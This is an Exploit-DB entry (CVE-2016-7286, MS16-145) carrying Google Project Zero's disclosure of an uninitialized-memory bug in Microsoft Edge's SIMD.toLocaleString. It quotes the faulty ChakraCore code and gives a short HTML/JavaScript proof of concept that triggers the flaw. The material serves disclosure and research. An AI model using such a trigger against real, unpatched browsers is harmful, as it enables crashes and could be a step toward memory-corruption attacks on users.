- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 40947
- Проверка EDB
-
- Пройдено
- Автор
- GOOGLE SECURITY RESEARCH
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2016-7286
- Дата публикации
- 2016-12-21
Microsoft Edge - SIMD.toLocaleString Uninitialized Memory (MS16-145)
HTML:
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=961
The following code occurs in JavascriptSIMDObject::ToLocaleString in JavascriptSimdObject.cpp:
Var* newArgs = HeapNewArray(Var, numArgs);
switch (numArgs)
{
case 1:
break;
case 2:
newArgs[1] = args[1];
break;
case 3:
newArgs[1] = args[1];
newArgs[2] = args[2];
break;
default:
Assert(UNREACHED);
}
If the call has more than three arguments, it will fall through, leaving newArgs uninitialized. This will cause toLocaleString to be called on uninitialized memory, having a similar effect to type confusion (as integers in the memory can be confused for pointers and vice-versa). A minimal PoC is as follows, and a full PoC is attached:
var v = SIMD.Int32x4(1, 2, 3, 4);
v.toLocaleString(1, 2, 3, 4)
-->
<html><body><script>
try{
var v = SIMD.Int32x4(1, 2, 3, 4);
alert(v.toLocaleString(1, 2, 3, 4, 5, 6, 7));
}catch(e){
alert(e.message);
}
</script></body></html>- Источник
- www.exploit-db.com
